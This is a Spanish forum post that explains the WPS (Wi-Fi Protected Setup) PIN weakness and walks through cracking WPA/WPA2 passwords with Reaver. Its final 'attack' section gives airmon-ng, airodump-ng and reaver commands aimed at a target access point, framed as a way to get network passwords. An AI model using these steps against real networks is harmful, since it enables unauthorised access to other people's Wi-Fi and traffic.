Por fin algo concreto para redes protegidas con WPA/WPA2
Que hay en este caso ?
Pues bien, se encontó una vulnerabilidad que permite explotar las redes seteadas con WPS mediante la cual podemos obtener esas contraseña que tanto buscamos...
El promedio de la duracion del ataque es de 4-10 hs, dependiendo del AP.
La mayoria de los dispositivos (incluidos Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL y
Technicolor) tienen dispositivos con certificacion WPS,otros (como TP-Link) "tienen soporte WPS, aunque no están certificados" (sic)
Pero que es WPS ?
WPS (Wi-Fi Protected Setup) es un estándar promovido por la Wi-Fi Alliance para la creación de redes WLAN seguras. En otras palabras, WPS no es un mecanismo de seguridad por sí, se trata de la definición de diversos mecanismos para facilitar la configuración de una red WLAN segura con WPA2, pensados para minimizar la intervención del usuario en entornos domésticos o pequeñas oficinas (SOHO). Concretamente, WPS define los mecanismos a través de los cuales los diferentes dispositivos de la red obtienen las credenciales (SSID y PSK) necesarias para iniciar el proceso de autenticación.
Hace poco se podian encontrar este tipo de notas (
Ahora la tienen Adentro :) ):
Mostrar/Ocultar
Aunque las redes inalámbricas han conseguido facilitar el que podamos disponer de conexión en cualquier punto de nuestra casa sin necesidad de cables, a cambio traen un problema de seguridad. Si no utilizamos algún tipo de protección, cualquiera podrá conectarse a nuestra red.
Si esa es nuestra decisión no hay ningún problema, pero en muchos casos los usuarios no saben como activar esa protección y configurar sus dispositivos para que la utilicen. Wi-Fi Protected Setup o WPS (con confundir con el sistema de posicionamiento) es un estándar con el que se quiere facilitar la puesta en marcha de una red segura.
La idea de WPS no es la de añadir más seguridad a las redes, sino facilitar el uso de los mecanismos existentes, como WPA o WPA2, a los usuarios sin necesidad de utilizar complicadas claves o tediosos procesos de configuración.
Existen dos métodos básicos para el funcionamiento de WPS, aunque se han añadido un par más que, aunque no forman parte del estándar, pueden ser implementados por los fabricantes en sus productos, pero que no son de obligado cumplimiento.
El primero de ellos es la introducción de un PIN. En este, cuando se detecta un nuevo dispositivo Wi-Fi en la red, el punto de acceso (o un representante autorizado de este, como podría ser un ordenador con los permisos adecuados) nos pedirá el PIN del dispositivo.
Este PIN vendrá, normalmente, impreso en una etiqueta en el propio dispositivo. Una vez introducido ambos se configurarán para permitir el acceso de este dispositivo a la red de forma segura, utilizando alguna de los sistemas de cifrado, como WPA.
El segundo de los métodos es el PBC o Push Button Configuration, que facilita todavía más el proceso, pues solo requiere que se pulse un botón en el punto de acceso y otro en el dispositivo que queramos unir a la red.
Este método tiene un pequeño problema y es que cualquier dispositivo podría conectarse a la red durante el pequeño intervalo de tiempo en que se configura el acceso, es decir, durante un par de minutos después de que pulsemos el botón en el punto de acceso, por lo que el primero es más recomendable.
El método del PIN es obligatorio para cualquier dispositivo que esté certificado como WPS, mientras que el método del PBC es obligatorio para los puntos de acceso pero no para los dispositivos.
Así que si queremos montar una red inalámbrica segura de forma sencilla, deberemos asegurarnos de que los próximos dispositivos que compremos estén certificados para WPS. La entidad de certificación nos ofrece una lista con todos los disponibles hasta el momento.
Comienza el ataque:
Ponemos la tarjeta de red en modo monitor
# airmon-ng start wlan0
Buscamos la red:
# airodump-ng mon0
Especificamos el BSSID del Access Point :
# reaver -i mon0 -b 00:01:02:03:04:05
o
Si que queremos ver detalladamente el proceso del ataque (lo ponemos en modo "verbose")
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
o
Apuramos el ataque:
Por default, Reaver tiene un delay de 1 segundo entre pins, de puede desactivar esto agregando '-d 0' pero no funciona esta opcion en algunos AP's:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
1.2:
[Enlace externo eliminado para invitados]
1.3:
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
Drivers Soportados (segun los primeros testeos):
ath5k
ath9k
rtl8187
carl19170
ipw2000
rt2800pci
b43
rt73usb
iwlagn
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]